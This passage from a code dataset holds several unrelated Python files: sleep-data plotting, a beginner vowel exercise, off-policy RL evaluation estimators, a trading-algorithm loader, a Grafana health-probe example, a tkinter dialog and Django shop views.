value_name=y).reset_index()\n hue = hue if y_level_name == facet_row or y_level_name == facet_col else y_level_name\n\n # if mean_center_means is not None:\n # for var in mean_center_means:\n # df[var] += df[var]*mean_center_means[var]['sd']+mean_center_means['mean']\n\n # df_prev = df.drop(['index', 'ppc_idx'], axis=1).groupby(\n # ['previous_bout', 'current_epoch', 'feature']).mean().reset_index()\n # df_prev.to_csv(\n # '../../data/processed/previous_bout_feature.csv')\n\n # df_prev = pd.read_csv('../../data/processed/previous_bout_feature.csv')\n #\n # df_current = df.drop(['index', 'ppc_idx'], axis=1).groupby(\n # ['current_epoch', 'feature']).mean().reset_index()\n # df_current.to_csv('../../data/output/current_bout_feature.csv')\n #\n # df_merged = pd.merge(df_current,df_prev, on=['current_epoch','feature'])\n # df_merged['Difference when inc previous stage'] = df_merged['feature_rate_p_x'] - df_merged['feature_rate_p_y']\n # df_merged['Trans P when marginalizing over previous stage'] = df_merged['feature_rate_p_x']\n # df_merged['Trans P inc previous stage'] = df_merged['feature_rate_p_y']\n # df_merged.drop(['feature_rate_p_y','feature_rate_p_x','Unnamed: 0'], axis=1).to_csv('../../data/output/full_feature_p.csv')\n\n\n if combine_trace:\n g = sns.relplot(data=df, x=x, y=y, hue=hue, kind='line', col=facet_col, row=facet_row, style=style, facet_kws={'sharex':False, 'sharey':False},\n legend=legend)#hue_order=['F','M'], hue_order=['waso','wbso','n1','n2'])#, row_order=['waso','n1','n2','n3','rem'], col_order=['waso','n1','n2','n3','rem'])\n else:\n g = sns.relplot(data=df, x=x, y=y, hue=hue, kind='line', col=facet_col, row=facet_row, style=style, estimator=None, units='ppc_idx', alpha=0.1,\n facet_kws={'sharex': False, 'sharey': False}, legend=legend, row_order=['waso','n1','n2','n3','rem'], col_order=['F','M'])#, hue_order=['n3','waso','n1','n2']) #for running with rem & previous bout\n if mean_center_means is not None and x in mean_center_means:\n for ax in g.axes.flatten():\n labels = np.round(ax.get_xticks()*mean_center_means[x]['std']+mean_center_means[x]['mean'],0)\n if x=='clocktime':\n labels[labels>12] = labels[labels>12]-12\n ax.set_xticklabels(labels=['%0.0f' % l for l in labels])\n else:\n ax.set_xticklabels(labels=labels)\n\n\n #plt.ylim([0, 10])\n if data_points is not None:\n if y_levels is not None:\n data_points = data_points.melt(id_vars=vars_ppc, value_vars=y_levels, var_name=y_level_name,\n value_name=y).reset_index()\n\n data_points = data_points.sample(df.shape[0], replace=True) #FIXME only plot real points here, dont sample more, turn oversamples to alpha=0\n g.data = data_points\n g.map_dataframe(scatterplot, x, y, hue=hue, size=0.02, alpha=points_alpha) #need to deal with style and coloring datapoints.\n # to_groupby = [v for v in [facet_row, facet_col] if v is not None]\n # if len(to_groupby) > 0:\n # df = df.set_index(to_groupby)\n # for idxs, data_slice in data_points.groupby(to_groupby):\n # iloc_idx = []\n # if ~isinstance(idxs,list): #FIXME maybe this need to be numpy array\n # idxs = [idxs]\n # for i in idxs:\n # if hasattr(g, 'row_names') and i in g.row_names:\n # iloc_idx.append(g.row_names.index(i))\n # else:\n # iloc_idx.append(0)\n # if hasattr(g, 'col_names') and i in g.col_names:\n # iloc_idx.append(g.col_names.index(i))\n #\n # if len(iloc_idx) < len(g.axes.shape):\n # iloc_idx.append(0)\n # idxs = tuple(iloc_idx)\n # #g.axes[idxs].set_xlim((data_slice.loc[:,x].min(), data_slice.loc[:,x].max()))\n # #g.axes[idxs].set_ylim((data_slice.loc[:,y].min(), data_slice.loc[:,y].max()))\n # if vars_to_label is not None:\n # df_slice = df[idxs]\n # x_text = (data_slice.loc[:,x].max()-data_slice.loc[:,x].min())/2\n # x_sd = (data_slice.loc[:,x].max()-data_slice.loc[:,x].min())/10\n # y_sd = (data_slice.loc[:,y].max()-data_slice.loc[:,y].min())/10\n # for var_to_label in vars_to_label:\n # for style_i, style_data in df_slice.groupby(var_to_label):\n # y_text = style_data.loc[(style_data[x]x_text-x_sd), y].iloc[0]\n # g.axes[idxs].annotate(style,\n # xy=(x_text, y_text), xycoords='data',\n # xytext=(x_text+0.1*x_sd, y_text+0.1*y_sd),\n # textcoords='data',\n # size=16, va=\"center\", ha=\"center\",\n # bbox=dict(boxstyle=\"round\", fc=\"w\"),\n # arrowprops=dict(arrowstyle=\"-|>\",\n # connectionstyle=\"arc3,rad=-0.2\",\n # fc=\"w\"))\n return g\n\n\n\n\n\n","repo_name":"bdyetton/PSleep","sub_path":"src/modeling/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72403206956","text":"def verificar_vogal(caracter):\n if caracter == 'a' or caracter == 'e' or caracter == 'i' or caracter == 'o' or caracter == 'u':\n return True\n else:\n return False\n\ndef verificar_caracter_especial(caracter):\n if (ord(caracter) < 97 or ord(caracter) > 122):\n return True\n else:\n return False\n\ncaracter = input(\"Caracter: \") \ncaracter_minusculo = caracter.lower()#já passo para minusculo para facilitar a verificacao de caracteres especiais \n\nif verificar_vogal(caracter_minusculo):\n print(\"O caracter é uma vogal\")\n\nelif not verificar_caracter_especial(caracter_minusculo):\n print(\"O caracter é uma consoante\")\n\nelse:\n print(\"Caracter inválido\")\n","repo_name":"CarlosModinez/LABIC","sub_path":"Aulas python/Primeira lista de exercicios/Exercicio_5.py","file_name":"Exercicio_5.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16276433424","text":"import numpy as np\nimport pandas as pd\nimport math\nfrom functools import partial\nimport itertools\n\ndef unscale_result(value, original_range=(-100, 100)):\n return value * (original_range[1] - original_range[0])+original_range[0]\n\ndef ois_sa_weights(dataset, e_policy, b_policy):\n # definition ois weights\n # ois_weights = e_policy / b_policy\n assert not ((b_policy == 0.0) & (e_policy > 0.0)).any(), \"Evaluation policy should have some support in behavior policy\"\n pi_b_as = dataset.apply(lambda x: b_policy[x.state, x.action_discrete], axis=1)\n pi_e_as = dataset.apply(lambda x: e_policy[x.state, x.action_discrete], axis=1)\n ois_weights = pi_e_as / pi_b_as\n return ois_weights\n\ndef ois_traj_weights(dataset, e_policy, b_policy):\n # store ois weight for each state-action pair in the trajectory\n ds = dataset.copy()\n ds['ois_weight'] = ois_sa_weights(ds, e_policy, b_policy)\n traj_weights = ds.groupby('icustay_id')['ois_weight'].transform('prod')\n return traj_weights\n\ndef ois_value_trajectory(dataset, e_policy, b_policy):\n \"\"\"\n Ordinary trajectory-based importance sampling as defined by Sutton & Barto 2nd ed., eq. 5.4 on page 104.\n \"\"\"\n traj_weights = ois_traj_weights(dataset, e_policy, b_policy)\n # multipliy importance weights in trajectory to determine trajectory importance weight (IW-T)\n # multiply traj IW-T with discounted return of trajectory\n ois_returns = traj_weights * dataset.traj_return\n return ois_returns\n\ndef ois_policy(dataset, e_policy, b_policy):\n ds = dataset.copy()\n ds['ois_returns'] = ois_value_trajectory(dataset, e_policy, b_policy)\n ds['ois_traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n ois_returns_stay = ds.groupby('icustay_id').first()['ois_returns']\n traj_weights_stay = ds.groupby('icustay_id').first()['ois_traj_weights']\n expectation = ois_returns_stay.mean()\n variance = np.var( ois_returns_stay * traj_weights_stay) / len(dataset)\n return (expectation, variance)\n\ndef phwis_policy(dataset, e_policy, b_policy):\n ds = dataset.copy()\n ds['traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n ds['traj_value'] = ois_value_trajectory(dataset, e_policy, b_policy)\n weights_vals = ds.groupby('icustay_id')[['traj_weights', 'traj_value', 'traj_len']].first()\n # TODO FdH: what is a 'fair' default? 0.0 is according to S&B p. 105, but it does not take into account negative reward weights_vals[\n if weights_vals['traj_weights'].sum() == 0:\n wis_policy = 0 # according to S&B p 105\n else:\n wis_policy = 0\n n_total_trajs = dataset.icustay_id.nunique()\n traj_lens = ds.groupby('icustay_id').traj_len.first()\n for l in traj_lens.unique():\n subset = weights_vals[weights_vals.traj_len == l]\n if subset['traj_weights'].sum() > 0.0:\n wis_policy += (len(subset)/ n_total_trajs) * (subset['traj_value'].sum() / subset['traj_weights'].sum())\n # determine WIS variance estimation according to \"Aslett, Coolen & De Bock\", page 30\n var = wis_var(wis_policy, ds.groupby('icustay_id')['traj_return'].first(), weights_vals['traj_weights'])\n return wis_policy, var, ds.groupby('icustay_id')['traj_weights'].first()\n\ndef wis_var(wis_policy, traj_returns, traj_weights):\n \"\"\"\n Inputs:\n * wis policy: OPE estimation\n * traj_returns: returns of trajectories as observed in the dataset\n * traj_weights: OPE estimation weights\n According to \"Aslett, Coolen & De Bock\", page 30\n \"\"\"\n traj_w_sq_norm = (traj_weights / traj_weights.sum()) ** 2\n traj_sq_err = (traj_returns - wis_policy) ** 2\n assert traj_w_sq_norm.shape == traj_sq_err.shape, \"Inputs should have compatible shape\"\n assert traj_w_sq_norm.shape[0] == len(traj_returns), \"Inputs should have compatible shape\"\n sigm_sq = (traj_w_sq_norm * traj_sq_err).sum()\n variance = sigm_sq.mean()\n return variance\n\ndef wis_policy(dataset, e_policy, b_policy):\n \"\"\"\n Weighted trajectory-based importance sampling as defined by Sutton & Barto, page 104/105.\n \"\"\"\n ds = dataset.copy()\n ds['traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n ds['traj_value'] = ois_value_trajectory(dataset, e_policy, b_policy)\n weights_vals = ds.groupby('icustay_id')[['traj_weights', 'traj_value']].first()\n # TODO FdH: what is a 'fair' default? 0.0 is according to S&B p. 105, but it does not take into account negative reward weights_vals[\n if weights_vals['traj_weights'].sum() == 0:\n wis_policy = 0 # according to S&B p 105\n else:\n wis_policy = weights_vals['traj_value'].sum() / weights_vals['traj_weights'].sum()\n # determine WIS variance estimation according to \"Aslett, Coolen & De Bock\", page 30\n var = wis_var(wis_policy, ds.groupby('icustay_id')['traj_return'].first(), weights_vals['traj_weights'])\n return wis_policy, var, ds.groupby('icustay_id')['traj_weights'].first()\n\n\ndef wdr_inner(ds, e_policy, b_policy, gamma):\n sa_weights = ois_sa_weights(ds, e_policy, b_policy)\n assert sa_weights.isna().sum() == 0, \"sa weight is nan somewhere in wdr_inner\"\n ds['sa_weights'] = sa_weights / sa_weights.sum()\n first_states = ds.sort_values(['icustay_id', 'start_time']).groupby('icustay_id').first()\n term_a = first_states.v_estimate.mean()\n assert not np.isnan(term_a), \"term_a is nan in wdr_inner\"\n ds['term_b'] = ds.reward - ds.q_estimate + gamma * ds.next_v_estimate\n assert ds['term_b'].isna().sum() == 0, \"term_b is nan somewhere in wdr_inner\"\n ds['weighted_sa'] = ds.gamma * ds.sa_weights * ds.term_b\n weighted_traj = ds.groupby('icustay_id').weighted_sa.sum()\n assert not np.isnan(weighted_traj).any(), \"weighted_traj is somewhere nan in wdr_inner\"\n summed_weighted_traj = weighted_traj.sum()\n assert not np.isnan(summed_weighted_traj), \"summed_weighted_traj is nan in wdr_inner\"\n return term_a, term_a + summed_weighted_traj\n\ndef wdr_policy(dataset, e_policy, b_policy, q_e_estimator, v_e_estimator, gamma):\n \"\"\"\n Weighted doubly robust estimator as introduced in Equation 2 of ''Data-Efficient\n Off-Policy Policy Evaluation for Reinforcement Learning'' by Thomas & Brunskill 2016.\n Takes as input a dataset of trajectories, an evaluation policy, a behavior policy, a\n state-value estimator for the evaluation policy 'v_e_estimator' and a state-action value\n estimator 'q_e_estimator'.\n \"\"\"\n ds = dataset.copy()\n ds['v_estimate'] = ds.state.apply(v_e_estimator)\n assert ds['v_estimate'].isna().sum() == 0, \"V estimate is nan somehwere\"\n ds['next_v_estimate'] = ds.state.apply(v_e_estimator).shift(-1).fillna(0.0) # reward is 0 for terminal absorbing states\n ds['q_estimate'] = ds[['state', 'action_discrete']].apply(q_e_estimator, axis=1)\n assert ds['q_estimate'].isna().sum() == 0, \"Q estimate is nan somehwere\"\n ds['gamma'] = ds.traj_count.apply(lambda x: gamma ** x)\n return wdr_inner(ds, e_policy, b_policy, gamma)\n\ndef phwdr_policy(dataset, e_policy, b_policy, q_e_estimator, v_e_estimator, gamma):\n \"\"\"\n Per-horizon weighted doubly robust estimator as introduced in Appendix A of\n ''Behaviour Policy Estimation in Off-Policy Policy Evaluation: Calibration\n Matters'' by Raghu et al. 2018.\n Takes as input a dataset of trajectories, an evaluation policy, a behavior policy, a\n state-value estimator for the evaluation policy 'v_e_estimator' and a state-action value\n estimator 'q_e_estimator'.\n \"\"\"\n # TODO FdH: implement\n ds = dataset.copy()\n ds['v_estimate'] = ds.state.apply(v_e_estimator)\n ds['next_v_estimate'] = ds.state.apply(v_e_estimator).shift(-1).fillna(0.0) # reward is 0 for terminal absorbing states\n ds['q_estimate'] = ds[['state', 'action_discrete']].apply(q_e_estimator, axis=1)\n ds['gamma'] = ds.traj_count.apply(lambda x: gamma ** x)\n n = ds.icustay_id.nunique()\n phwdr_result = 0.0\n for l in ds.traj_len.unique():\n subset = ds[ds.traj_len == l]\n n_subset = subset.icustay_id.nunique()\n _, wdr_inner_result = wdr_inner(subset, e_policy, b_policy, gamma)\n phwdr_inner = wdr_inner_result * (n_subset / n)\n assert not np.isnan(phwdr_result), \"phwdr is nan for length {}\".format(l)\n phwdr_result += phwdr_inner\n return phwdr_result\n\n\ndef infer_estimators_tabular(dataset, policy, gamma, k):\n \"\"\"\n Infers Q and V estimators for a given policy using FQE.\n \"\"\"\n n_actions = policy.shape[1]\n n_states = policy.shape[0]\n q_estimate = np.zeros(shape=(n_states, n_actions))\n v_estimate = np.zeros(shape=n_states)\n for i in range(k):\n targets = [[[] for _ in range(n_actions)] for _ in range(n_states)]\n for row in dataset[['state', 'action_discrete', 'reward', 'next_state']].itertuples():\n s, a, r, ns = row.state, row.action_discrete, row.reward, row.next_state\n nqv = 0\n assert not np.isnan(r), \"reward is nan for {}\".format((s,a,ns))\n if ns < n_states:\n for a in range(n_actions):\n assert not np.isnan(q_estimate[ns, a]), \"q_estimate is nan for {}\".format((s,a))\n assert not np.isnan(policy[ns, a]), \"policy is nan for {}\".format((s,a))\n nqv += q_estimate[ns, a] * policy[ns, a]\n targets[s][a].append(r + gamma * nqv)\n else:\n targets[s][a].append(r)\n for s, a in itertools.product(range(n_states), range(n_actions)):\n if len(targets[s][a]) > 0:\n q_estimate[s, a] = sum(targets[s][a]) / len(targets[s][a])\n for s in range(n_states):\n v_estimate_s = 0\n for a in range(n_actions):\n assert np.isnan(policy[s, a]).sum() == 0, \"policy is nan for {}\".format((s,a))\n assert np.isnan(q_estimate[s, a]) == 0, \"q_estimate is nan for {}\".format((s,a))\n v_estimate_s += q_estimate[s, a] * policy[s, a]\n v_estimate[s] = v_estimate_s\n assert not np.isnan(v_estimate[s]), \"v estimate is nan for {}\".format(s)\n return q_estimate, v_estimate\n\ndef infer_estimators_func(dataset, policy, gamma, k):\n def get_from_tabular_sa(tabular, sa):\n return tabular[sa[0], sa[1]]\n def get_from_tabular_s(tabular, state):\n return tabular[state]\n q_tabular, v_tabular = infer_estimators_tabular(dataset, policy, gamma, k)\n return partial(get_from_tabular_sa, q_tabular), partial(get_from_tabular_s, v_tabular)\n\n\ndef inner_ess(importance_weights):\n \"\"\"\n helper function to compute effective sample sizes.\n \"\"\"\n normalized_importance_weights = importance_weights / importance_weights.sum()\n return (normalized_importance_weights ** 2).sum()\n\ndef ess(importance_weights):\n \"\"\"\n Returns the effective sample size according to the standard definition for importance sampling by Kong (1992).\n \"\"\"\n ess = inner_ess(importance_weights)\n if ess == 0.0:\n return 0.0\n else:\n return 1.0 / inner_ess(importance_weights)\n\ndef hcope(dataset, e_policy, b_policy, c, delta, unscale=True, optimized=True):\n \"\"\"\n High-confidence off policy evaluation for a given dataset, evaluation\n policy, behavior policy, c and delta. Returns the estimated lower bound of the mean\n for a 1-delta confidence level in the original scale of unscale=True.\n If unscale=False, the result is given on the returns scaled to [0,1].\n If optimized=True, it uses an implementation that requires only a single pass over the data.\n \"\"\"\n assert c > 0, \"c parameter should be > 0, given {}\".format(c)\n assert 0 < delta < 1, \"delta parameter should be in (0,1), given {}\".format(delta)\n ds = dataset.copy()\n # scale the trajectory returns to [0, 1]\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n traj_values = ds.groupby('icustay_id')['traj_value'].first()\n n = len(traj_values)\n# if c > traj_values.max():\n# raise ValueError(\"c of {} bigger than max of {}\".format(c, traj_values.max()))\n cs = np.repeat(c, n)\n Y = np.minimum(traj_values, cs)\n if optimized:\n hcope_result = _hcope_singlepass(Y, cs, delta)\n else:\n hcope_result = _hcope_thm1(Y, cs, delta)\n if unscale:\n result = unscale_result(hcope_result, original_range=(return_min, return_max))\n else:\n result = hcope_result\n return result\n\ndef _hcope_thm1(Y, cs, delta):\n \"\"\"\n Implemented according to Thm.1 in Thomas, Teocharous and Ghavamzadeh (2015).\n Assumes cs is an array with constant value.\n \"\"\"\n n = len(Y)\n empirical_mean = Y.mean()\n second_term = ((1 / cs).sum() ** -1) * ((7*n*np.log(2/delta))/(3*(n-1)))\n third_term_sum = 0\n c = cs[0]\n for i in Y:\n for j in Y:\n third_term_sum += ((i/c) - (j/c))**2\n third_term = ((1/ cs).sum() ** -1) * math.sqrt((np.log(2/delta)/(n-1))*third_term_sum)\n return empirical_mean - second_term - third_term\n\ndef _hcope_singlepass(Y, cs, delta):\n \"\"\"\n Implemented according to Remark 3 in Thomas, Teocharous and Ghavamzadeh (2015).\n Takes a single pass over the Y input.\n Assumes cs is an array with constant value.\n \"\"\"\n n = len(Y)\n c = cs[0]\n Y2 = Y / cs\n term_1 = (n / c) ** -1\n brack_term_1 = Y2.sum() - (7*n*math.log(2/delta))/(3*(n-1))\n brack_inner_1 = n*(Y2**2).sum()\n brack_inner_2 = Y2.sum() ** 2\n brack_term_2 = math.sqrt(((2*math.log(2/delta))/(n-1)) *(brack_inner_1 - brack_inner_2))\n return term_1 * (brack_term_1 - brack_term_2)\n\ndef hcope_prediction(ds, e_policy, b_policy, n_post, c, delta, unscale=True):\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n traj_values = ds.groupby('icustay_id')['traj_value'].first()\n n_pre = len(traj_values)\n cs = np.repeat(c, n_pre)\n Y = np.minimum(traj_values, cs)\n term_sample_mean = Y.sum()\n term2 = (7*c*math.log(2/delta))/(3*(n_post-1))\n term3 = math.log(2/delta)/n_post\n term4 = 2 / (n_pre*(n_pre-1))\n term5 = n_pre * (Y**2).sum() - term_sample_mean**2\n hcope_prediction = term_sample_mean - term2 - math.sqrt(term3*term4*term5)\n if unscale:\n result = unscale_result(hcope_prediction, original_range=(return_min, return_max))\n else:\n result = hcope_prediction\n return result\n\ndef am(dataset, e_policy, b_policy, delta, unscale=True):\n \"\"\"\n Implemented according to Anderson Inequality in Thomas, Teocharous and Ghavamzadeh (2015).\n \"\"\"\n assert 0 < delta < 1\n ds = dataset.copy()\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_return'] = (ds.traj_return + abs(return_min)) / (return_max + abs(return_min))\n assert ds['traj_return'].min() == 0.0\n assert ds['traj_return'].max() == 1.0\n ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n traj_values = ds.groupby('icustay_id')['traj_value'].first()\n n = len(traj_values)\n zs = sorted(traj_values)\n maxz = max(zs)\n sum_r = 0\n for i, z in enumerate(zs[:-1]):\n sum_r += (zs[i+1] - z) * min(1, i/n+math.sqrt((np.log(2/delta))/(2*n)))\n am_result = maxz - sum_r\n if unscale:\n return unscale_result(am_result, original_range=(return_min, return_max))\n else:\n return am_result\n","repo_name":"florisdenhengst/guideline-informed-vent-rl","sub_path":"scripts/ope.py","file_name":"ope.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74224344555","text":"import imp\nimport coza.errors\nfrom coza.api import ExchangeApi\n\n\ndef load_functions(code):\n try:\n alg = imp.new_module('myalgo')\n exec(code, alg.__dict__)\n initialize = getattr(alg, 'initialize')\n run_strategy = getattr(alg, 'run_strategy')\n make_orders = getattr(alg, 'make_orders')\n\n return (initialize, run_strategy, make_orders)\n except AttributeError as e:\n raise coza.errors.CozaException(str(e))\n except:\n raise coza.errors.CozaException(f'Failed to load algorithm module')\n\n\ndef validation_exchange_currency(exchange, currency):\n exchange = exchange.lower()\n currency = currency.upper()\n exchange_info = ExchangeApi.get_exchange_info()\n\n if exchange in exchange_info.keys():\n if currency in exchange_info[exchange]:\n return True\n raise coza.errors.CozaCurrencyException(currency)\n raise coza.errors.CozaExchangeException(exchange)\n","repo_name":"Derek-tjhwang/CATS-LAB","sub_path":"coza/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"40339599779","text":"\"\"\"\nExample program for probing whether a data source is healthy.\n\nDocumentation: https://github.com/panodata/grafana-client/blob/main/examples/datasource-health-probe.rst\n\"\"\"\nimport json\nimport logging\nimport sys\nfrom optparse import OptionParser\n\nimport requests\nfrom verlib2 import Version\n\nfrom grafana_client import GrafanaApi\nfrom grafana_client.client import GrafanaClientError\nfrom grafana_client.knowledge import datasource_factory\nfrom grafana_client.model import DatasourceModel\nfrom grafana_client.util import setup_logging\n\nlogger = logging.getLogger(__name__)\n\n\nVERSION_7 = Version(\"7\")\nVERSION_8 = Version(\"8\")\nVERSION_9 = Version(\"9\")\n\n\ndef ensure_datasource(grafana: GrafanaApi, datasource: DatasourceModel):\n \"\"\"\n Ensure data source exists and is configured like desired.\n\n Either create the data source, or update it. The data source name will be\n used as data source identified.\n \"\"\"\n\n datasource_name = datasource.name\n\n # Create data source.\n datasource = datasource.asdict()\n try:\n logger.info(f\"Creating data source '{datasource_name}'\")\n datasource = grafana.datasource.create_datasource(datasource)[\"datasource\"]\n except GrafanaClientError as ex:\n # When data source already exists, update data source.\n if ex.status_code == 409:\n logger.info(f\"Data source already exists: {ex.response}. Updating.\")\n datasource_existing = grafana.datasource.get_datasource_by_name(datasource_name=datasource_name)\n datasource = grafana.datasource.update_datasource(datasource_existing[\"id\"], datasource)[\"datasource\"]\n else:\n logger.error(\n f\"Failed to create or update data source '{datasource}'. \"\n f\"Reason: {ex.message}. Response: {ex.response}\"\n )\n raise\n return datasource\n\n\ndef health_probe(grafana: GrafanaApi, datasource: DatasourceModel):\n \"\"\"\n Add a data source dynamically, run a data source health check on it,\n and delete it again. Be graceful if the data source exists already.\n \"\"\"\n # Create data source.\n datasource = ensure_datasource(grafana, datasource)\n datasource_uid = datasource[\"uid\"]\n\n # Invoke the health check.\n health_info = grafana.datasource.health_inquiry(datasource_uid=datasource_uid)\n\n # Delete data source again.\n grafana.datasource.delete_datasource_by_uid(datasource_uid)\n\n return health_info.asdict_compact()\n\n\ndef prometheus_demo(grafana: GrafanaApi):\n datasource = DatasourceModel(\n name=\"probe-prometheus\", type=\"prometheus\", url=\"http://host.docker.internal:9090\", access=\"server\"\n )\n health_info = health_probe(grafana, datasource)\n return health_info\n\n\ndef run(grafana: GrafanaApi, grafana_version: Version = None):\n # When called without options, invoke the Prometheus demo.\n if len(sys.argv) == 1:\n if grafana_version < VERSION_8:\n raise NotImplementedError(\n f\"Data source health check subsystem on Grafana version {grafana_version} not supported for Prometheus\"\n )\n health_info = prometheus_demo(grafana)\n\n # When called with options,\n else:\n # parse them, and\n parser = OptionParser()\n parser.add_option(\"--type\", dest=\"type\", help=\"Data source type\")\n parser.add_option(\"--url\", dest=\"url\", help=\"Data source URL\")\n (options, args) = parser.parse_args()\n if (not options.type or not options.url) and not options.type == \"testdata\":\n parser.error(\"Options --type and --url required\")\n\n # Sanity checks\n if options.type == \"prometheus\" and grafana_version < VERSION_8:\n raise NotImplementedError(\n f\"Data source health check subsystem on Grafana version {grafana_version} not supported for Prometheus\"\n )\n\n # ... create a dynamic data source with the corresponding values.\n name = f\"probe-{options.type}\"\n datasource = DatasourceModel(name=name, type=options.type, url=options.url, access=\"server\")\n datasource = datasource_factory(datasource)\n\n # Invoke the health probe.\n health_info = health_probe(grafana, datasource)\n\n # Display the outcome and terminate program based on success state.\n print(json.dumps(health_info, indent=2))\n if not health_info[\"success\"]:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n setup_logging(level=logging.DEBUG)\n\n # Connect to Grafana instance and run health probe.\n grafana_client = GrafanaApi.from_env()\n\n try:\n grafana_client.connect()\n except requests.exceptions.ConnectionError:\n logger.exception(\"Connecting to Grafana failed\")\n raise SystemExit(1)\n\n grafana_version = Version(grafana_client.version)\n if grafana_version < VERSION_7:\n raise NotImplementedError(f\"Data source health check subsystem not ready for Grafana version {grafana_version}\")\n\n run(grafana_client, grafana_version=grafana_version)\n","repo_name":"panodata/grafana-client","sub_path":"examples/datasource-health-probe.py","file_name":"datasource-health-probe.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"73"} +{"seq_id":"10850829704","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport tkinter.font as font\nfrom LongRunningClass import LongRunningClass\n\nclass change_font_size_flow(LongRunningClass):\n\n def __init__(self, font):\n super().__init__()\n self.change_font_size_frame = None\n self.local_font = font\n self.force_exit_called = False\n self.completion_callback = None\n self.new_font_size = None\n pass\n\n def add_completion_callback(self, callback):\n self.completion_callback = callback\n\n def get_new_font_size(self):\n return self.new_font_size\n\n \n def create_font_size_change_window(self, current_font_size):\n self.change_font_size_frame = tk.Toplevel()\n self.change_font_size_frame.geometry(\"300x300\")\n self.change_font_size_frame.title(\"Change font size\")\n \n choices_frame = tk.Frame(self.change_font_size_frame)\n button_frame = tk.Frame(self.change_font_size_frame)\n info_label = tk.Label(choices_frame, text=\"Enter new font size:\", font=self.local_font)\n info_label.pack(side=tk.TOP, anchor=tk.W)\n \n new_font_size = tk.StringVar(choices_frame, \"\")\n if current_font_size != None:\n new_font_size.set(str(current_font_size))\n \n font_size_box = tk.Entry(choices_frame, textvariable = new_font_size, font=self.local_font)\n font_size_box.pack(side=tk.TOP, anchor=tk.W)\n \n \n ok_button = tk.Button(button_frame, text=\"Change font size\", command=lambda: self.make_font_size_change(info_label, new_font_size), font=self.local_font)\n cancel_button = tk.Button(button_frame, text=\"Cancel\", command=lambda: self.kill_change_font_size_frame(), font=self.local_font)\n \n ok_button.pack(side=tk.LEFT)\n cancel_button.pack(side=tk.LEFT)\n \n choices_frame.pack(side=tk.TOP)\n button_frame.pack(side=tk.TOP)\n \n self.change_font_size_frame.protocol(\"WM_DELETE_WINDOW\", lambda: self.kill_change_font_size_frame())\n return\n\n \n #####################################################################\n def make_font_size_change(self, info_label, new_font_size):\n new_font_size_int = -1\n try:\n new_font_size_int = int(new_font_size.get())\n except ValueError:\n pass\n \n if new_font_size_int != -1:\n self.new_font_size = new_font_size_int\n if self.completion_callback != None:\n self.completion_callback(self)\n self.kill_change_font_size_frame()\n else:\n info_label.configure(text=\"Please enter a valid font size:\")\n \n \n \n #####################################################################\n def kill_change_font_size_frame(self):\n if self.change_font_size_frame != None:\n self.change_font_size_frame.destroy()\n self.change_font_size_frame = None\n\n\n def force_exit(self):\n super().force_exit()\n self.force_exit_called = True\n \n\n","repo_name":"markaoconnell/QRienteering","sub_path":"OMeetWithMemberList/MeetSW/font_size_change_flow.py","file_name":"font_size_change_flow.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"70505651116","text":"from myadmin.models import Goods,Type,Users,Detail,Orders\nfrom django.shortcuts import render,redirect\nimport time\nfrom django.http import HttpResponse\nfrom django.core.paginator import Paginator\nfrom django.core.urlresolvers import reverse\n\ndef loadContext(request):\n\tcontext={}\n\tcontext['tlist'] = Type.objects.filter(pid=0)\n\treturn context\n\n# 首页\ndef index(request,tid=0):\n context = loadContext(request)\n # 获取所需商品列表信息并放置到context\n context['alllist'] = Goods.objects.order_by('num').filter(state__in=[1,2])[0:4]\n context['alllist1'] = Goods.objects.order_by('num').filter(state__in=[1,2])[5:9]\n context['zuixinlist'] = Goods.objects.order_by('addtime').filter(state__in=[1,2])[0:4]\n if tid == 0:\n context['stulist'] = Goods.objects.filter(state__in=[1,2])[0:12]\n else:\n #获取当前类别下的所有子类别信息\n context['Type'] = Type.objects.filter(pid=tid)\n # 判断参数ttid是否有值\n if request.GET.get('tid',None):\n tid = request.GET['tid']\n print(tid)\n context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n print(3)\n # print(context['stulist'])\n \n a = Type.objects.filter()\n \n pidlist = set()\n for i in a :\n pidlist.add(i.pid)\n print(pidlist)\n tid = int(tid)\n print(tid)\n if(tid in pidlist) :\n context['stulist'] = Goods.objects.filter(typeid__in=Type.objects.only('id').filter(path__contains=','+str(tid)+',')).filter(state=2)[0:11]\n \n print(2)\n else:\n # 获取指定商品类别下的所有商品信息\n context['stulist'] = Goods.objects.filter(typeid=tid).filter(state=2)[0:11]\n print(1)\n # 如tid=1的sql:select * from myweb_goods where typeid in(select id from myweb_type where path like '%,1,%')\n print(context)\n return render(request,'myweb/index.html',context)\n\n# 列表页\ndef list(request,tid=0):\n context = loadContext(request)\n # 获取所需商品列表信息并放置到context\n if tid == 0:\n context['stulist'] = Goods.objects.filter(state=2)\n else:\n #获取当前类别下的所有子类别信息\n context['Type'] = Type.objects.filter(pid=tid)\n if request.GET.get('tid',None):\n tid = request.GET['tid']\n print(tid)\n context['stulist'] = 